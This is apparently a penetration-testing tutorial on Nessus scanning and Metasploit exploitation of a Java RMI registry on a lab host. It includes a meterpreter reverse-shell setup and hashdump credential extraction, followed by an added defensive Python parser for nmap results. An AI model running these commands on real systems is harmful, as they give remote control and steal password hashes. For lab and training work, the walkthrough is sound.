How to Perform a Vulnerability Scan in Nessus: VNC and RMI Registry Vulnerability Exploitation
Step 1:
Go to the My Scans section and click New Scan
Step 2:
Go to User Defined Scan and select our Policy
Refer to this article to create a policy: https://www.admincool.com/2021/03/how-to-create-policy-in-nessus.html
Step 3:
Enter a Name and Description for our first scan
Step 6:
Click MyScan to see details
Step 7:
Click the Vulnerabilities tab to see the result
Test VNC Vulnerability identified by Nessus
Enter the password identified by Nessus
Vulnerability: RMI Registry Detection
Scan open ports in the background
┌──(kali㉿kali)-[~]
└─$ nmap -sS -sV 192.168.1.221 -p1-65535
Run msfconsole
Search for Java_RMI exploits
msf6 > search java_rmi
msf6 > use exploit/multi/misc/java_rmi_server
msf6 exploit(multi/misc/java_rmi_server) > show payloads
msf6 exploit(multi/misc/java_rmi_server) > set payload java/meterpreter/reverse_tcp
msf6 exploit(multi/misc/java_rmi_server) > show options
msf6 exploit(multi/misc/java_rmi_server) > set RHOST 192.168.1.221
msf6 exploit(multi/misc/java_rmi_server) > set SRVHOST 192.168.65.128
msf6 exploit(multi/misc/java_rmi_server) > set LHOST 192.168.65.128
msf6 exploit(multi/misc/java_rmi_server) > show options
msf6 exploit(multi/misc/java_rmi_server) > exploit
Once the connection is obtained,
# sessions -l
# sessions -i 1
# sysinfo
# hashdump
# run /post/linux/gather/hashdump
# getuid
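For triaging the same two findings across many hosts, the following added example (not part of the original article) parses nmap grepable output and lists every open VNC or RMI registry port with a remediation note. It assumes the scan above is re-run with `-oG -`; the function name, advice strings and sample output are constructed for illustration.

```python
import re

# Service names nmap -sV reports for the two findings this page walks through.
# The advice text is this example's own wording, not Nessus output.
WATCHED = {
    "vnc": "VNC: set a strong password and limit access to admin hosts",
    "java-rmi": "RMI registry: firewall the port from untrusted networks",
    "rmiregistry": "RMI registry: firewall the port from untrusted networks",
}

# Constructed sample of `nmap -sS -sV -oG -` output (not captured from a real host).
SAMPLE = (
    "# Nmap scan initiated (constructed sample)\n"
    "Host: 192.168.1.221 ()\tStatus: Up\n"
    "Host: 192.168.1.221 ()\tPorts: 22/open/tcp//ssh//OpenSSH 4.7p1/, "
    "1099/open/tcp//java-rmi//GNU Classpath grmiregistry/, "
    "5900/open/tcp//vnc//VNC (protocol 3.3)/, "
    "5901/closed/tcp//vnc-1///\tIgnored State: filtered (65531)\n"
)


def exposed_services(grepable):
    """Return (host, port, service, version, advice) for open VNC/RMI ports."""
    findings = []
    for line in grepable.splitlines():
        # Only "Host: ... Ports: ..." lines carry per-port results.
        if not line.startswith("Host:") or "\tPorts: " not in line:
            continue
        host = line.split()[1]
        ports = line.split("\tPorts: ", 1)[1].split("\t", 1)[0]
        # Entries end with "/" and are joined by ", "; split only at that
        # boundary so a comma inside a version string does not break parsing.
        for entry in re.split(r"(?<=/), (?=\d+/)", ports):
            fields = entry.split("/")
            if len(fields) < 7:
                continue  # malformed entry
            # Field order: port/state/protocol/owner/service/rpcinfo/version/
            port, state, _proto, _owner, service, _rpc, version = fields[:7]
            if state == "open" and service in WATCHED:
                findings.append((host, int(port), service, version, WATCHED[service]))
    return findings


if __name__ == "__main__":
    for host, port, service, version, advice in exposed_services(SAMPLE):
        print(f"{host}:{port} {service} ({version}) -> {advice}")
```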